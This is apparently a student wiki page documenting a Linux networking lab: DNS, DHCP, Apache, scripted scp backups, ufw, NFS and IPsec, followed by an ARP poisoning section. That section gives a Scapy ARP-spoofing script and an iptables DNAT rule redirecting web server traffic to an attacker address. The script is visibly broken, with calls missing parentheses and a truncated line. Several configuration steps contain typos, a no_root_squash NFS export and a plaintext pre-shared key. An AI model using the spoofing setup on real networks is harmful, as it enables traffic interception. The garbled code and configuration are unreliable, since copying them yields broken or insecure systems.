User:Zahramkd95

Group Members
- Karthikeyan Nadhamuni - Aghanash Karthik - Ramkumar Balasubramani - Zahra Mohammedi

The linux project is implemented to combine different networking components and run a successful network. DHCP is used to assign IP Addresses, DNS

is used for domain name resolving, Webserver is used for accessing information via HTTP and firewall is used to make the network secure.

Protocol Behavior
Domain Name System A domain name is simple and easily remembered by a human brain and hence it is widely used. Domain Name Servers also known as DNS is used to resolve

those domain names to machine friendly IP Addresses and access the correct the website. The DNS Server is implemented with the help of an Open Source Software called BIND which stands for “Berkeley Internet Name Domain”. In this

Project, a master and slave DNS is implemented where the slave DNS acts as a backup.

Dynamic Host Control Protocol Dynamic Host Control Protocol (DHCP) is an extended version of BOOTP (Bootstrap Protocol). It has a pool of desired IP Addresses allocated to it.

Whenever a client joins a network, the DHCP Server allocates an IP Address to the client. The DHCP server responds to BOOTP as well as DHCP requests

and this can be configured in three different methods.

Whenever a client joins a network. The IP Address is assigned to it on first cum first served basis and the availability of the address. The address

is available only for a particular period of time after which it is released to the DHCP pool.

Automatic Allocation In this method, the client is given preference over a particular IP address automatically every time it joins the network by making the lease period

infinity.

Manual Allocation Using the client’s MAC address, the desired IP address is mapped to it. Whenever the client joins the network, the DHCP server identifies the

hardware address and allocates a fixed IP Address to the client.

Webserver It is used to process HTTP requests to distribute information on the World Wide Web. A client can access information from the web by typing the

appropriate domain name. The Webpage is handled by the webserver. In this project, apache2 is used to configure the webserver.

Backup Backup is used to make the make sure the system is more robust towards failure. Backup makes sure information is intact even after the failure of

the system. In this project, backup of all the servers are made and sent to the remote host where all information is stored.

Domain Name System
Configuration of Master DNS

Installing DNS

Step 1 : Install Bind9 using the following command on your Linux Machine.

sudo apt-get install bind9

Step 2 : Enter the file named.conf.local by typing the following command

sudo nano /etc/bind/named.conf.local

Step 3 : Edit the named.conf.local file by typing the following script

// Do any local configuration here //       zone "linux.project" { type master; file "/etc/bind/zones/linux.project"; allow-transfer { 192.168.2.9; }; };       zone "2.168.192.in-addr.arpa" { type master; file "/etc/bind/zones/rev.linux.project"; allow-transfer { 192.168.2.9; }; };       zone "5.5.5.0.b.0.4.0.0.2.6.0.1.0.0.2.ip6.arpa" { type master; file "/etc/bind/zones/ip6rev.linux.project"; allow-transfer { 192.168.2.9; }; };

The above script is used to configure the master DNS and it is used to create forward and the reverse zones for both ipv4 and ipv6 addressing.

Step 4 : Configure the named.conf.options to include the forwarders list.

Step 5 : Create a forward zone file with the suffix having the domain name.

IN     NS      ns1.linux.project. IN     NS      ns2.linux.project. ; name servers - A records web.linux.project. IN     CNAME   kkrz ns1.linux.project. IN     A       192.168.2.8 ns2.linux.project. IN     A       192.168.2.9 kkrz.linux.project. IN     AAAA    2001:620:40b:555::113 kkrz.linux.project. IN     A       192.168.2.10 IN     NS      ns1.linux.project. IN     NS      ns2.linux.project. ; name servers - A records 10     IN      PTR     kkrz.linux.project. 8      IN      PTR     ns1.linux.project. 9      IN      PTR     ns2.linux.project. IN     NS      ns1.linux.project. IN     NS      ns2.linux.project. ; name servers - A records 3.1.1.0.0.0.0.0.0.0.0.0.0.0.0.0     IN      PTR     kkrz.linux.project.

Configuring a DNS Slave Server

Step 1 : Install Bind9 using the following command on your Linux Machine.

sudo apt-get install bind9

Step 2 : Enter the file named.conf.local by typing the following command

sudo nano /etc/bind/named.conf.local

Step 3 : Edit the named.conf.local file by typing the following script

// Do any local configuration here //   zone "linux.project" { type slave; file "/var/cache/bind/linux.project”;   allow-transfer{none;};    masters {192.168.2.8;};    masterfile-format text;    };    zone "2.168.192.in-addr.arpa" {    type slave;    file "/var/cache/bind/rev.linux.project”; allow-transfer{none;}; masters {192.168.2.8;}; masterfile-format text; };   zone "5.5.5.0.b.0.4.0.0.2.6.0.1.0.0.2.ip6.arpa" { type slave; file "/var/cache/bind/ipv6rev.linux.project”;   allow-transfer{none;};        masters {192.168.2.8;};    masterfile-format text;    };

The above script is used to configure the slave DNS and it is used to create forward and the reverse zones for both ipv4 and ipv6 addressing.

Dynamic Host Control Protocol
Configuration of the DHCP Server

Step 1: Install isc-dhcp server by typing the following command in the linux terminal. sudo apt-get install isc-dhcp-server

Step 2 : Edit the isc-dhcp-server file sudo nano /etc/default/isc-dhcp-server OPTIONS= “-6” INTERFACES=”ens33”

Step 3: Edit the dchp.conf script sudo nano /etc/dhcp/dhcp.conf INTERFACES="ens33" subnet 192.168.2.0 netmask 255.255.255.0 { range 192.168.2.11 192.168.2.30; option domain-name-servers 192.168.2.8, 192.168.2.9; option domain-name "project.linux"; option subnet-mask 255.255.255.0; option routers 192.168.2.1; option broadcast-address 192.168.2.255; default-lease-time 60; max-lease-time 72; }             host webserver { hardware ethernet 00:0c:29:0d:58:fb; fixed-address 192.168.2.10; }             host backup { hardware ethernet 00:0c:29:8a:01:74; fixed-address 192.168.2.5; }

Step 4: Create a new file called dhcp6.conf and edit the script.

Sudo cp /etc/dhcp/dhcp.conf /etc/dhcp/dhcp6.conf Sudo nano /etc/dhcp/dhcp6.conf subnet6 2001:620:40b:555::/64 { range6 2001:620:40b:555::100 2001:620:40b:555::110; option dhcp6.name-servers 2001:0:0:1::1; option dhcp6.domain-search "domain.example";} host webserver { host-identifier option dhcp6.client-id 0:1:0:1:1f:d6:24:d6:0:c:29:d:58:fb; fixed-address6 2001:620:40b:555::113;}

Step 5: To invoke the ipv6 server type the following command on the terminal. Sudo service isc-dhcp-server6 start

Configuration of the DHCP Client Step 1:Edit the script interfaces to ensure smooth running of the ipv4 and ipv6 addressing Auto ens33 iface en33 inet dhcp iface ens33 inet6 dhcp

Step 2: Release the dhcp client address for ipv4 addressing Sudo dhclient -r ens33

Step 3: Release the dhcp client address for ipv6 addressing Sudo dhclient –6 -r ens33

Step 4: Request a dhcp address for ipv4 address Sudo dhclient -v ens33

Step 5: Request a dhcp address for ipv6 address Sudo dhclient -6 -v ens33

Webserver
Commands to configure Webserver

Step 1: Install apache2 package Sudo apt-get install apache2

Step 2: Enter the directory index.html Sudo nano /var/www/index.html

Step 3: Edit the script index.html to develop a basic Webpage Linux Project Testing Our Webserver Works

Step 4: Restart the Webserver sudo /etc/init.d/apache2 restart

Backup
Commands to configure Backup Step 1: Install open-ssh on the linux server Sudo apt-get install open-ssh

Step 2: Install expect package Sudo apt-get install expect

Step 3: Create a new file and type the following script to create the backup script file. #!/bin/bash TIME=`date +%b-%d-%I-%M-%S` FILENAME=backup-$TIME.tar.gz                SRCDIR=/var/www DESDIR=/home/zahramkd95/zahrabackup tar -cpzf $DESDIR/$FILENAME $SRCDIR # the tarring is done using this command /usr/bin/expect <<EOD spawn scp $DESDIR/$FILENAME karthik@192.168.2.5:/home/karthik/Pictures/webserver expect { "password:" { send "*****" expect "*\r" expect "\r" }              }                EOD

Step 3: Crontab is used for scheduling the backup using a cronjob which includes the bash script to dump the file for every 5 mins.

Crontab -e

Firewall
Commands to configure firewall Step 1: Install ufw package Sudo apt-get install ufw

Step 2: Enable the firewall Sudo ufw enable

Step 3: Deny all incoming packets by default Sudo ufw default deny incoming

Step 4: Allow the necessary ports and protocols according to the need of the network for maximum security

Sudo ufw allow 80/tcp Sudo ufw allow 80/udp Sudo ufw allow 22 Sudo ufw allow 21/tcp

Step 5: Check the status of the firewall Sudo ufw status verbose

Add ons
NFS

Commands for configuring NFS Server

Step 1:Install the nfs kernel package sudo apt-get install nfs-kernel-server

Step 2: Edit the exports file to give root priviledge. sudo nano /etc/exports /home 192.168.2.5/(rw,sync,no_root_squash,no_subtree_check)

Step 3:Create the NFS table to hold the exports of shares. sudo exportfs -a

Step 4: Start the service. sudo service nfs-kernel-server start

Command for NFS Client Configuration:

Step 1: Install nfs-common package for client configuration. sudo apt-get install nfs-common

Step 2 : Creating a directory sudo mkdir -p /mnt/nfs/home

Step 3: Mounting the file sudo mount IP Address:/$Destination Dir of Client$ $Destination path of the server$

IPSec VPN

Step 1:Install strongswan Sudo apt-get install ipsec-tools strongswan-starter

Step 2: Edit the IPsec configuration file. Sudo nano /etc/ipsec.conf conn Server1-to-Server2 authby=secret auto=route keyexchange=ike left=192.168.2.8 right=192.168.2.9 type=transport esp=aes128gcm16! ## the Encapsulated Security Payload value

Step 3: Edit the ipsec.secrets file Sudo nano /etc/ipsec.secrets 192.168.2.8 192.168.9 : PSK "Password"

Step 4: Restart the ipsec with the following command Sudo ipsec restart

Step 5:The status of IPsec can be checked using the command. Sudo ipsec statusall

Configuration for the Second Server

Step 1: Install strongswan. Sudo apt-get install ipsec-tools strongswan-starter

Step 2: Edit the ipsec.conf file in this server and mention the appropriate IP Configuration. Sudo nano /etc/ipsec.conf conn server2-to-server1 authby=secret auto=route keyexchange=ike left=192.168.2.9 right=192.168.2.8 type=transport esp=aes128gcm16!

Step 3 :Create the file where the PSK will be held and mention the IP configurations. Sudo nano /etc/ipsec.secrets

Step 4:Restart IPsec by typing the following command. Sudo ipsec restart

Configurations to test tunelling On server1 type the following ping -s 4048 192.168.2.8 On Server 2 type the following sudo ipsec statusall

ARP Poisoning.

Scapy Script

from scapy.all import *        ##Import the Scapy script import sys def get_mac_address:        ## Function which defines the MAC address my_macs = [get_if_hwaddr(i) for i in get_if_list] for mac in my_macs:                                  ## The following loop checks if the MAC             address is 0 or not. if(mac != "00:00:00:00:00:00"): return mac Timeout=2 my_mac = get_mac_address packet = Ether/ARP(op="who-has",hwsrc=my_mac,psrc=sys.argv[2],pdst=sys.argv[1$           sendp(packet)

IP Rule: The following IP tables represents the destination NAT which nats the web server IP to the attacker IP address. sudo iptables -t nat -A PREROUTING -i ens33 -d 192.168.2.47 -j DNAT --to 192.168.2.12